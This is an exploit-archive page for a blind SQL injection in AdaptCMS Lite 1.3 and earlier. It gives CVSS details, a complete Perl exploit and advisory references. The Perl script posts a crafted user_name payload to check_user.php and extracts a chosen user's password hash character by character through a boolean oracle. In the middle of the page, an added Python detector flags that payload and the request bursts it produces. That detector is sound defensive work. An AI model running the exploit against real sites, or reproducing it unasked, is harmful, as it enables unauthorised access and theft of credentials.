AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit

2008.10.10
Credit: StAkeR
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl
# -----------------------------------------------------
# AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit
# Discovered By StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On 03/10/2008
# -----------------------------------------------------
# Download http://www.insanevisions.com/page/downloads
# -----------------------------------------------------
use strict;
use LWP::UserAgent;

# $hash: characters recovered so far, $send: current payload, $sub: position being tested
my ($hash, $send, $sub) = (undef, undef, 1);
my ($host, $uid) = @ARGV;

usage() unless $host =~ /^http:\/\/(.+?)$/i and $uid =~ /^[0-9]$/;

# POST the user_name value to check_user.php and read the reply as a boolean
# oracle: a successful response that does not contain "yes" counts as "true".
sub send_request {
    my $param = shift @_;
    my $http  = LWP::UserAgent->new;
    my $post  = $http->post($host.'/includes/check_user.php', [ user_name => $param ]);
    if ($post->is_success) {
        return 38 unless $post->content =~ /yes/i;
    }
    return 0;   # request failed or reply contained "yes"
}

# Candidate characters: ASCII codes for 0-9 and a-f (a hex digest)
my @chars = (48..57, 97..102);

# Recover the stored password hash one character position at a time
for (0..32) {
    foreach my $set (@chars) {
        $send = "' or ascii(substring((select password".
                " from adaptcms_users where id=$uid),$sub,1))=$set#";
        if (send_request($send) > 1) {
            $hash .= chr($set);
            $sub++;
            last;
        }
    }
}

sub usage {
    print "[?] AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit\n";
    print "[?] Usage: perl $0 http://[host] [user id]\n";
    exit;
}

if (defined $hash) {
    print "[?] Hash: $hash\n";
    exit;
} else {
    print "[?] Exploit Failed!\n";
    exit;
}
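The exploit above works as a boolean oracle: one POST to includes/check_user.php per candidate character, so a successful run produces a burst of requests from one client whose user_name value carries the ascii(substring(...))= comparison. The following Python detector is an added example, not part of the advisory or of AdaptCMS; it assumes a constructed application-level audit log format (timestamp, client IP, path, submitted user_name) and flags both the payload signature and the request burst.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines (not from the advisory): timestamp, client IP,
# request path and the user_name value submitted to the endpoint.
SAMPLE_LOG = """\
2008-10-10T12:00:01 10.0.0.5 /includes/check_user.php user_name=alice
2008-10-10T12:00:02 10.0.0.9 /includes/check_user.php user_name=' or ascii(substring((select password from adaptcms_users where id=1),1,1))=48#
2008-10-10T12:00:02 10.0.0.9 /includes/check_user.php user_name=' or ascii(substring((select password from adaptcms_users where id=1),1,1))=49#
2008-10-10T12:00:03 10.0.0.9 /includes/check_user.php user_name=' or ascii(substring((select password from adaptcms_users where id=1),1,1))=50#
2008-10-10T12:00:07 10.0.0.7 /includes/check_user.php user_name=bob
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) user_name=(.*)$")
# Signature of the oracle used by the published exploit: a quote break, an OR,
# an ascii(substring(...)) comparison against a number, and a MySQL '#' comment.
ORACLE_RE = re.compile(r"'\s*or\s+ascii\s*\(\s*substring\s*\(.*\)\s*=\s*\d+\s*#", re.I)

def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, path, value = m.groups()
    return {"ts": datetime.fromisoformat(ts), "ip": ip, "path": path, "value": value}

def analyze(log_text, burst_threshold=3, window_seconds=60):
    """Return (signature_hits, burst_sources) for requests to check_user.php.
    signature_hits: (ip, user_name) pairs whose value matches ORACLE_RE.
    burst_sources: IPs that sent >= burst_threshold requests within window_seconds."""
    hits, per_ip = [], defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/includes/check_user.php"):
            continue
        if ORACLE_RE.search(rec["value"]):
            hits.append((rec["ip"], rec["value"]))
        per_ip[rec["ip"]].append(rec["ts"])
    bursts = set()
    for ip, times in per_ip.items():
        times.sort()   # sliding window over sorted timestamps
        for i in range(len(times) - burst_threshold + 1):
            if (times[i + burst_threshold - 1] - times[i]).total_seconds() <= window_seconds:
                bursts.add(ip)
                break
    return hits, bursts
```

Rate-based detection matters here because a character-by-character oracle needs many requests even when the payload is obfuscated past the signature.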

References:

http://www.adaptcms.com/article/51/News/URGENT-AdaptCMS-13-Security-Fix-Released/
http://secunia.com/advisories/32171
http://xforce.iss.net/xforce/xfdb/45642
http://www.securityfocus.com/bid/31557
http://www.milw0rm.com/exploits/6662


Copyright 2024, cxsecurity.com
